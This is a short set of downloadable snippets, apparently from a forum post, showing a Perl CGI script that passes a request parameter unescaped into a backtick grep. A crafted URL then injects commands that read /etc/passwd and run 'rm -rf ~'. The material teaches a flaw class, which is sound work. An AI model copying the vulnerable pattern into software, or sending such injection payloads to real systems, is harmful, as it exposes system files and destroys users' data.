Help for this page

Select Code to Download


  1. or download this
    $ItemForm   = param('item');
    $OldLine = `grep $ItemForm stock.dat`;
    
  2. or download this
    /cgi-bin/script.cgi?item=t%20/etc/passwd;%20rm%20-rf%20~;echo
    
  3. or download this
    `grep t /etc/passwd; rm -rf ~; cat stock.dat`